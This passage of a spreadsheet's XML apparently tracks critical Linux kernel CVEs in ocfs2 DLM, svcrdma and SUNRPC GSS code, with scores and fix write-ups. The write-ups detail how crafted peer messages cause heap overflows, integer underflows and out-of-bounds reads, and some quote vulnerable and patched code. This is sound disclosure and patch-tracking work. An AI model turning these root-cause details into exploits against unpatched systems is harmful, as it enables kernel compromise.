Validate these fields right after dlm_grab(), before anything uses them --
including the not-joined error path, which already prints mres-&gt;lockname
with the unbounded lockname_len as a %.*s precision.  Reject the message
unless lockname_len &lt;= DLM_LOCKID_NAME_MAX, num_locks &lt;=
DLM_MAX_MIGRATABLE_LOCKS (the bound the sender already asserts), and the
payload is large enough to hold the claimed locks.  Conforming recovery
and migration messages are unaffected.</t>
        </is>
      </c>
      <c r="S50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89494</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89495</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: bound namelen in dlm_migrate_request_handler
Patch series "ocfs2/dlm: bound peer-controlled lengths in the o2dlm".
The o2dlm receive handlers trust u8 length and count fields from the wire
without bounding them, so a node in a DLM domain can corrupt or panic any
other node with a malformed message.  Three defects:
  - dlm_migrate_request_handler() passes migrate-&gt;namelen unchecked to
    dlm_init_mle(), which memcpy()s it into the 32-byte mname[] of an
    o2dlm_mle slab object: a heap out-of-bounds write of up to ~215
    attacker-controlled bytes.
  - dlm_mig_lockres_handler() passes mres-&gt;lockname_len unchecked to
    dlm_init_lockres(), which memcpy()s it into the 32-byte o2dlm_lockname
    slab object: a heap out-of-bounds write of up to ~223 bytes.
  - the same handler trusts mres-&gt;num_locks without checking that the
    message is large enough to hold that many entries, so
    dlm_process_recovery_data() walks mres-&gt;ml[] past the kmalloc(data_len)
    copy and trips a BUG_ON (an out-of-bounds read ending in a panic).
The other o2dlm receive handlers already reject an oversized name; the
migration and recovery handlers have omitted it since the DLM was added
(see the Fixes tags).  Patch 1 bounds namelen; patch 2 validates
lockname_len, num_locks, and the payload size.  Conforming recovery and
migration traffic is unaffected.
o2net authenticates peers only by the DLM domain key, so any node that has
joined the domain -- including a compromised or malicious member -- can
send these messages.  There is no local trigger; the attacker must already
be a member of the cluster.
Each sink was confirmed under KASAN with an out-of-tree module mirroring
it exactly -- a kmem_cache/kmalloc of the real destination size, then the
same unclamped memcpy/loop: slab-out-of-bounds Write for the two writes,
Read for the recovery walk, and a panic.  A userspace AddressSanitizer
build faults identically under -m32 and -m64.  Scrubbed logs are available
on request.
I reported this privately to security@kernel.org and the ocfs2 maintainers
on 2026-06-20; with no response after the standard embargo period I am
posting the fix publicly.  I have no embargo requirement.
This patch (of 2):
A node receiving a DLM_MIGRATE_REQUEST message trusts the peer-supplied
name length (migrate-&gt;namelen) without bounding it.  dlm_init_mle() then
copies that many bytes into the fixed DLM_LOCKID_NAME_MAX-byte mname[]
array of an o2dlm_mle slab object, so a malformed message from a cluster
peer overflows the slab object by up to ~215 bytes: a heap out-of-bounds
write of attacker-controlled data, reachable by any node in the domain.
Reject an oversized name, the way dlm_master_request_handler() and the
other o2dlm receive handlers already do; the migration handler omits the
check entirely.  Conforming messages are unaffected.</t>
        </is>
      </c>
      <c r="S51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89495</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89526</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Validate Read chunk positions before reconstruction
The RPC/RDMA Read chunk position field is supplied by the remote
client and stored verbatim in the parsed chunk list.
xdr_count_read_segments() checks only 4-byte alignment; it never
compares the position against the received inline body length.
In the single-chunk path, svc_rdma_read_complete_one() splits the
head and tail kvecs at ch_position. A position past the inline
body underflows the tail length, exposing adjacent slab memory to
the upper XDR decoder.
In the multi-chunk path, svc_rdma_read_multiple_chunks() computes
gap lengths between chunks as unsigned subtractions from
ch_position. Overlapping Read chunks cause these subtractions to
underflow. A final position past the inline body likewise
underflows the trailing gap length. svc_rdma_copy_inline_range()
then copies past the receive buffer into request pages that are
returned to the client through the Reply channel.
Bound inline-range copies in svc_rdma_copy_inline_range() against
the decoded inline RPC body saved in rc_saved_arg. Reject a
single Read chunk positioned beyond that body, and reject
multi-chunk lists where accumulated read bytes exceed the next
chunk's position. Apply the same position and overlap checks in
the call-chunk interleaving path.</t>
        </is>
      </c>
      <c r="S52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89526</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89530</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Reject inline replies that overflow the pull-up buffer
An RPC-over-RDMA client can request a reply, such as an NFS READ
payload, without providing a Write list or a Reply chunk to carry
it. When such a reply needs more scatter/gather entries than the
device's Send Queue supports, svc_rdma_pull_up_needed() selects
pull-up and svc_rdma_pull_up_reply_msg() linearizes the whole
reply into sctxt-&gt;sc_xprt_buf. That buffer is only sc_max_req_size
bytes, while the reply on this path is bounded only by the client's
request, so svc_rdma_xb_linearize() copies past the end of the
buffer and corrupts adjacent slab memory. The oversized length is
then stored in sc_sges[0].length and posted, so the device also
reads beyond the mapped region.
The SGE-exhaustion branch is the only pull-up path that can exceed
the buffer: the threshold branch pulls up only replies smaller
than RPCRDMA_PULLUP_THRESH, and replies that fit the device's SGE
budget are sent directly without linearization. Make
svc_rdma_pull_up_needed() report -E2BIG when the reply it would
pull up cannot fit sc_max_req_size, and fail the request with
ERR_CHUNK as RFC 8166 Section 4.5.3 directs rather than dropping
the connection.
The helper no longer answers a simple yes/no question: it now
reports pull-up, no pull-up, or -E2BIG for a reply too large to
linearize. Rename svc_rdma_pull_up_needed() to
svc_rdma_check_pull_up() so its name no longer implies a boolean
predicate.</t>
        </is>
      </c>
      <c r="S53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89530</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89533</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Fix offset arithmetic in read_chunk_range
svc_rdma_read_chunk_range() walks a Read chunk's segment list to
build a sub-range starting at byte offset and spanning length bytes
for a Position-Zero or Call chunk. Two arithmetic defects in the
per-segment loop produce wrong DMA lengths and a u32 underflow:
    pcl_for_each_segment(segment, chunk) {
            if (offset &gt; segment-&gt;rs_length) {
                    offset -= segment-&gt;rs_length;
                    continue;
            }
            dummy.rs_handle = segment-&gt;rs_handle;
            dummy.rs_length = min_t(u32, length,
                                    segment-&gt;rs_length) - offset;
            dummy.rs_offset = segment-&gt;rs_offset + offset;
First, the skip predicate uses '&gt;' instead of '&gt;='. When offset
equals the segment's full rs_length, the segment is fully consumed
and should be skipped, but the loop falls through into the body.
The resulting dummy.rs_length is min_t(u32, length, rs_length) -
rs_length, which underflows to a near-UINT_MAX u32 when length is
smaller than rs_length, or is zero otherwise.
Second, the length formula subtracts offset from the min_t() result
rather than from segment-&gt;rs_length before the cap. For offset &gt; 0
the segment's residual is rs_length - offset, not rs_length, so the
cap must be applied to the residual. With the current bracketing,
whenever length is smaller than rs_length - offset the per-segment
length becomes length - offset instead of length, silently dropping
offset bytes from the rebuilt chunk. Combined with the boundary
case above it also enables the u32 underflow path, which propagates
a huge nr_bvec into svc_rdma_build_read_segment() and a multi-MiB
kmalloc_array_node() in svc_rdma_get_rw_ctxt().
Additionally, svc_rdma_read_call_chunk() can invoke this function
with length == 0 when the last Read chunk ends exactly at the end
of the Call chunk. With the corrected &gt;= predicate, every segment
is skipped and the function returns the initial -EINVAL, rejecting
a valid request. Return success immediately when length is zero.
Also break out of the loop once length is fully consumed to avoid
passing zero-length segments to svc_rdma_build_read_segment().
Fix by using '&gt;=' so a fully-consumed segment is skipped, by
moving '- offset' inside min_t() so the cap is applied to the
segment's residual length, by returning success for zero-length
requests, and by stopping iteration when the requested range has
been consumed.</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89533</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89536</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: wait for in-flight client TLS handshake callback
xs_tls_handshake_sync() gives xs_tls_handshake_done() a reference to the
lower transport before submitting the handshake request. On timeout or
signal, the synchronous waiter drops that reference after calling
tls_handshake_cancel().
handshake_req_cancel() returns false when handshake_complete() has
already marked the request complete. In that case the completion callback
can still be running, so dropping the callback-owned reference in the
waiter can free the lower transport before xs_tls_handshake_done() stores
xprt_err or drops its own reference.
If cancellation loses to completion, wait until xs_tls_handshake_done()
signals handshake_done and let the callback release its reference. This
mirrors the server-side handshake lifetime handling and keeps the timeout
or signal return value unchanged.</t>
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89536</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89538</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: Reject krb5 v2 wrap tokens with oversized ec field
gss_krb5_unwrap_v2() sets buf-&gt;len to a logical
length, which can be much smaller than head[0].iov_len
(the allocated receive-page capacity).  It then calls
xdr_buf_trim() with a trim length derived from the 16-bit
"extra count" (ec) field in the Kerberos v2 token header.
The ec field is authenticated by the post-decrypt memcmp()
against the encrypted header copy, so a randomly-mutated
value is rejected.  However, any peer holding a valid GSS
context can legitimately encrypt a token whose ec exceeds
the plaintext length.  Per RFC 4121, such a token is
structurally malformed.
Although xdr_buf_trim() now clamps the buf-&gt;len subtraction
to avoid unsigned underflow, the buffer is still left in a
semantically invalid state (zero length, inconsistent iov
lengths) when ec is oversized.
Reject these tokens before calling xdr_buf_trim(), giving
callers a well-defined GSS_S_DEFECTIVE_TOKEN error and
keeping the xdr_buf internally consistent.  The wrapped blob
begins at a nonzero offset -- both callers pass len as
offset + opaque_len -- so buf-&gt;len still counts the offset
bytes that precede the blob.  Compare the trim length
against the remaining wrapped segment, buf-&gt;len - offset,
rather than the whole buffer; comparing against buf-&gt;len
alone leaves an offset-wide window in which an oversized ec
passes the test and xdr_buf_trim() cuts into the bytes ahead
of the blob.</t>
        </is>
      </c>
      <c r="S56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89538</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89541</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: harden gss_unwrap_resp_priv length checks
gss_unwrap_resp_priv() validates the RPCSEC_GSS opaque length with
    offset = (u8 *)(p) - (u8 *)head-&gt;iov_base;
    if (offset + opaque_len &gt; rcv_buf-&gt;len)
            goto unwrap_failed;
    maj_stat = gss_unwrap(ctx-&gt;gc_gss_ctx, offset,
                          offset + opaque_len, rcv_buf);
Both operands are u32 and the sum is computed in u32. A reply with
opaque_len near 0xffffffff makes offset + opaque_len wrap to a small
value that is below rcv_buf-&gt;len, so the bound check passes and
gss_unwrap() is called with end &lt; begin. The check also lacks a
lower bound, so any opaque_len in [0, GSS_KRB5_TOK_HDR_LEN) is
accepted and forwarded to gss_krb5_unwrap_v2(), whose pre-decrypt
header reads at ptr+4 and ptr+6 then run past the token.
A krb5p NFS server returning a crafted RPCSEC_GSS reply can drive
the client into out-of-bounds reads in gss_krb5_unwrap_v2() and the
rotate_left() loop that follows.
Fix by replacing the single combined check with three guards that
are safe in u32 arithmetic and that enforce the RFC 4121 minimum
outer token length:
    if (offset &gt; rcv_buf-&gt;len)
            goto unwrap_failed;
    if (opaque_len &gt; rcv_buf-&gt;len - offset)
            goto unwrap_failed;
    if (opaque_len &lt; GSS_KRB5_TOK_HDR_LEN)
            goto unwrap_failed;
The first guard makes the subtraction in the second guard
unconditionally safe; offset is derived from a successful
xdr_inline_decode() in the head kvec, so in practice it already
satisfies the bound. The floor mirrors the server-side check added
in commit 5b757c2e57a5 ("SUNRPC: svcauth_gss: enforce krb5 token
minimum length").</t>
        </is>
      </c>
      <c r="S57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89541</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89542</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: harden gss_krb5_unwrap_v2 against short tokens
gss_krb5_unwrap_v2() reads the EC and RRC header fields at ptr+4 and
ptr+6 before validating that the token is at least GSS_KRB5_TOK_HDR_LEN
(16) bytes long, and its rotate_left() helper passes buf-&gt;len - base
to xdr_buf_subsegment() without verifying that base &lt;= buf-&gt;len. When
a caller hands in a sub-16-byte token, or a token whose declared len
leaves base past the end of the buffer, three distinct failures follow:
    gss_krb5_unwrap_v2(offset, len, buf)
      ptr = buf-&gt;head[0].iov_base + offset
      ec  = *(ptr + 4)              /* OOB read on short head */
      rrc = *(ptr + 6)              /* OOB read on short head */
      rotate_left(offset + 16, buf, rrc)
        xdr_buf_subsegment(buf, &amp;subbuf,
                           base, buf-&gt;len - base)   /* u32 wrap when base &gt; len */
        _rotate_left(&amp;subbuf, shift)
          shift %= buf-&gt;len         /* divide-by-zero when base == len */
After decryption, the cleanup arithmetic has the same shape:
    movelen = min_t(unsigned int, buf-&gt;head[0].iov_len, len);
    movelen -= offset + GSS_KRB5_TOK_HDR_LEN + headskip;
    BUG_ON(offset + GSS_KRB5_TOK_HDR_LEN + headskip + movelen &gt;
                                            buf-&gt;head[0].iov_len);
The BUG_ON re-adds the value just subtracted, so it reduces to
min(A, B) &gt; A and is permanently false; it cannot catch the unsigned
underflow of movelen, which then drives a ~UINT_MAX-byte memmove().
Add four defense-in-depth guards inside the unwrap core so it is safe
regardless of what its callers validate:
  - reject tokens with len - offset &lt; GSS_KRB5_TOK_HDR_LEN before
    touching ptr+4/ptr+6;
  - bail from rotate_left() when buf-&gt;len &lt;= base, covering both the
    underflow and zero-length cases;
  - return early from _rotate_left() when buf-&gt;len is zero, so the
    shift %= buf-&gt;len modulo cannot fault;
  - replace the dead BUG_ON with a live check that returns
    GSS_S_DEFECTIVE_TOKEN before the movelen subtraction.</t>
        </is>
      </c>
      <c r="S58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89542</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89546</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr"/>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: close backchannel before destroying callback service
A backchannel receive can complete a request while the NFS callback
service is being torn down.  xprt_complete_bc_request() removes the
request from bc_pa_list, drops bc_alloc_count, marks the request in use,
and then asks xprt_enqueue_bc_request() to hand it to the callback
service.
If teardown has already cleared xprt-&gt;bc_serv, xprt_enqueue_bc_request()
currently returns without enqueueing or freeing the committed request.
The xprt_get() taken on entry is leaked as well.  If the producer wins
the race before bc_serv is cleared, it can also enqueue onto sv_cb_list
after nfs_callback_down() has stopped the callback threads, leaving the
request linked to a svc_serv that is about to be freed.
Close the producer side before callback threads are stopped.  Add
xprt_svc_shutdown_bc() to clear xprt-&gt;bc_serv under bc_pa_lock, and call
it on callback shutdown and callback-start failure before stopping the
service threads.  Requests that lose the NULL transition in
xprt_enqueue_bc_request() are released through the normal backchannel
free path after balancing bc_slot_count.  Finally, drain any remaining
sv_cb_list requests after the callback threads have stopped and before
svc_destroy() frees the service.</t>
        </is>
      </c>
      <c r="S59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89546</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89550</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr"/>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: svcauth_gss: enforce krb5 token minimum length
svcauth_gss_unwrap_priv() validates only an upper bound on the
wire-supplied opaque length before handing the buffer to
gss_unwrap():
    if (len &gt; xdr_stream_remaining(xdr))
            goto unwrap_failed;
    offset = xdr_stream_pos(xdr);
    ...
    maj_stat = gss_unwrap(ctx, offset, offset + len, buf);
The wire value `len` flows unchanged as the upper bound into the
krb5 unwrap path, so a len in [0, 16] passes this check and is
handed to gss_unwrap(). For a krb5 v2 context that lands in
gss_krb5_unwrap_v2(), which reads the 16-byte RFC 4121 token
header fields at ptr+4 and ptr+6 and then calls rotate_left()
before any integrity check. With a sub-header length the header
reads run past the token, and _rotate_left()'s `shift %= buf-&gt;len`
path can divide by zero when buf-&gt;len has been driven to zero by
the truncated token. A header-only token (len == 16) is equally
invalid: with a non-zero RRC field and the opaque blob ending at
the XDR buffer boundary, rotate_left() builds a zero-length
subbuffer, reaching the same division.
Reject the token at the server entry point before it reaches the
krb5 unwrap core. A valid sealed RFC 4121 token must contain
the 16-byte header plus at least some encrypted payload.
Fix by adding a minimum-length check immediately after the
existing upper-bound check:
    if (len &lt;= GSS_KRB5_TOK_HDR_LEN)
            goto unwrap_failed;</t>
        </is>
      </c>
      <c r="S60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89550</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89551</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
